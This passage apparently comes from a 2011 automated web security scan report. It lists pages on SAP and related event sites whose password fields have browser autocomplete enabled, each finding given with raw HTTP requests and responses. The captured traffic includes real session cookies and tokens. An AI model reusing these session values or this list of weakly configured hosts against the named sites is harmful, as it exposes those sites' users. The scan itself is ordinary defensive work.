CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/plain
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
Location: https://www.sme.sap.com:443/irj/sme/logon
Content-Length: 0
Date: Sat, 15 Oct 2011 14:32:52 GMT
Connection: keep-alive
Set-Cookie: saplb_*=(J2EE3417600)3417650; Version=1; Path=/; HttpOnly; secure
Set-Cookie: Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; Domain=.sme.sap.com; Expires=Thu, 02-Nov-2079 17:46:59 GMT; Path=/; secure
Set-Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; Domain=www.sme.sap.com; Path=/irj/sme; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; Version=1; Path=/; HttpOnly; secure
Set-Cookie: SDNSTATE=526651564.14340.0000; path=/

13. Password field with autocomplete enabled  previous  next
There are 36 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

13.1. https://sapphire-nowmadrid.sapevents.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://sapphire-nowmadrid.sapevents.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: sapphire-nowmadrid.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:35:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<table width="100%" border="0" bordercolor="red" cellspacing="0" cellpadding="3" align="left">
                           <form name="RegForm" id="RegForm" action="index.cfm" method="POST" enctype="multipart/form-data" onsubmit="return _CF_checkRegForm(this)">
   
   <input type="Hidden" name="sAttID" value="">
...[SNIP]...
<td colspan="3" class="field-label" align="Left" valign="Top" width="420" style="padding-top:3px;padding-bottom:3px;">
                                                           <input name="sPassword" id="sPassword" type="password" maxlength="10" class="form" size="10" />
                                                       <br>
...[SNIP]...
13.2. https://teched2011madrid.sapevents.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://teched2011madrid.sapevents.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/reghotel/home.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:32 GMT
Content-Length: 47531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<table width="100%" border="0" bordercolor="red" cellspacing="0" cellpadding="3" align="left">
                           <form name="RegForm" id="RegForm" action="index.cfm" method="POST" enctype="multipart/form-data" onsubmit="return _CF_checkRegForm(this)">
   
   <input type="Hidden" name="sAttID" value="">
...[SNIP]...
<td colspan="3" class="field-label" align="Left" valign="Top" width="420" style="padding-top:3px;padding-bottom:3px;">
                                                           <input name="sPassword" id="sPassword" type="password" maxlength="10" class="form" size="10" />
                                                       <br>
...[SNIP]...
13.3. https://teched2011madrid.sapevents.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.cfm?fuseaction=reg.ReturnLogin HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/reghotel/home.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:27 GMT
Content-Length: 31925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<table width="100%" border="0" bordercolor="red" cellspacing="0" cellpadding="3" align="left">
                           <form name="RegForm" id="RegForm" action="index.cfm" method="POST" enctype="multipart/form-data" onsubmit="return _CF_checkRegForm(this)">
   
   <input type="Hidden" name="sAttID" value="">
...[SNIP]...
<td colspan="3" class="field-label" align="Left" valign="Top" width="420" style="padding-top:3px;padding-bottom:3px;">
                                                           <input name="sPassword" id="sPassword" type="password" maxlength="10" class="form" size="10" />
                                               
                                                   </td>
...[SNIP]...
13.4. http://www.asugonline.com/cms/FormBuilder/Register.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.asugonline.com
Path:   /cms/FormBuilder/Register.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cms/FormBuilder/Register.aspx?EventId=12&popupTitle=Register%20Yourself&popupWidth=800&popupHeight=500&formtypeid=1 HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.asugonline.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:27:46 GMT
Content-Length: 22076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
<body class="body" style=" margin: 0px" >
<form name="form1" method="post" action="Register.aspx?EventId=12&amp;popupTitle=Register+Yourself&amp;popupWidth=800&amp;popupHeight=500&amp;formtypeid=1" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
...[SNIP]...
<td width="35%" style="Padding: 0px 0px 0px 15px;"><input name="DynamicFormControl1$ctrlPassword105" type="password" id="DynamicFormControl1_ctrlPassword105" class="textbox" /></td>
...[SNIP]...
13.5. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:12 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:12 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:12 GMT
Content-Length: 148981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
<body>
       <form name="mobjForm" method="post" action="index.epx?URL_ID=Q311_cs2011_freetrial_estore&amp;kNtBzmUK9zU=1" onsubmit="javascript:return WebForm_OnSubmit();" id="mobjForm">
<div>
...[SNIP]...
<br />
                                       <input name="mobjTemplate$ctl01$ctl00$newFormLogon$txtPassword" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_newFormLogon_txtPassword" class="form" />
                                       
                                   </td>
...[SNIP]...
<td align="left" valign="middle">
<input name="mobjTemplate$ctl01$ctl00$Password" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_Password" style="width:165px;" />&nbsp;
<div class="HelpTipFlyout"
id='Password_Tooltip_Text'
>
...[SNIP]...
<td align="left" valign="middle">
<input name="mobjTemplate$ctl01$ctl00$VerifyPassword" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_VerifyPassword" style="width:165px;" />&nbsp;
<div class="HelpTipFlyout"
id='VerifyPassword_Tooltip_Text'
>
...[SNIP]...
13.6. https://www.sap.com/contactsap/index.epx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/index.epx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /contactsap/index.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sap.com/customer-showcase/innovation/index.epx?olt=CG4D999063
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:40 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:40 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:40 GMT
Content-Length: 75986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<body>
       <form name="mobjForm" method="post" action="/contactsap/index.epx?pmelayer=true&amp;kNtBzmUK9zU=1" id="mobjForm">
<div>
...[SNIP]...
<br />
                                       <input name="mobjTemplate$ctl01$ctl00$newFormLogon$txtPassword" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_newFormLogon_txtPassword" class="form" />
                                       
                                   </td>
...[SNIP]...
13.7. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/login.epx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /profile/login.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:45 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:45 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:46 GMT
Content-Length: 90895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<body>
       <form name="mobjForm" method="post" action="login.epx?pmelayer=true&amp;kNtBzmUK9zU=1" onsubmit="javascript:return WebForm_OnSubmit();" id="mobjForm">
<div>
...[SNIP]...
<br />
                                       <input name="mobjTemplate$ctl01$ctl00$ctl00$newFormLogon$txtPassword" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_ctl00_newFormLogon_txtPassword" class="form" />
                                       
                                   </td>
...[SNIP]...
<br />
                                       <input name="mobjTemplate$ctl01$ctl00$ctl00$FormLogOn1$txtPassword" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_ctl00_FormLogOn1_txtPassword" class="form" />
                                       
                                   </td>
...[SNIP]...
</label>
<input name="mobjTemplate$ctl01$ctl00$ctl00$Password" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_ctl00_Password" tabindex="6" />
                <a href="javascript:;" class="questionmark">
...[SNIP]...
</label>
<input name="mobjTemplate$ctl01$ctl00$ctl00$VerifyPassword" type="password" maxlength="8" id="mobjTemplate_ctl01_ctl00_ctl00_VerifyPassword" tabindex="7" />
<a href="javascript:;" class="questionmark">
...[SNIP]...
13.8. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:08 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:08 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:09 GMT
Content-Length: 12172


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<body>
       <form name="mobjForm" method="post" action="slogin.epx?pmelayer=true&amp;kNtBzmUK9zU=1" id="mobjForm">
<div>
...[SNIP]...
<br />
                                       <input name="mobjTemplate$loginctrl$txtPassword" type="password" maxlength="8" id="mobjTemplate_loginctrl_txtPassword" class="form" />
                                       
                                   </td>
...[SNIP]...
13.9. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /profile/slogin.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11978
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:50 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:50 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<body>
       <form name="mobjForm" method="post" action="slogin.epx" id="mobjForm">
<div>
...[SNIP]...
<br />
                                       <input name="mobjTemplate$loginctrl$txtPassword" type="password" maxlength="8" id="mobjTemplate_loginctrl_txtPassword" class="form" />
                                       
                                   </td>
...[SNIP]...
13.10. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
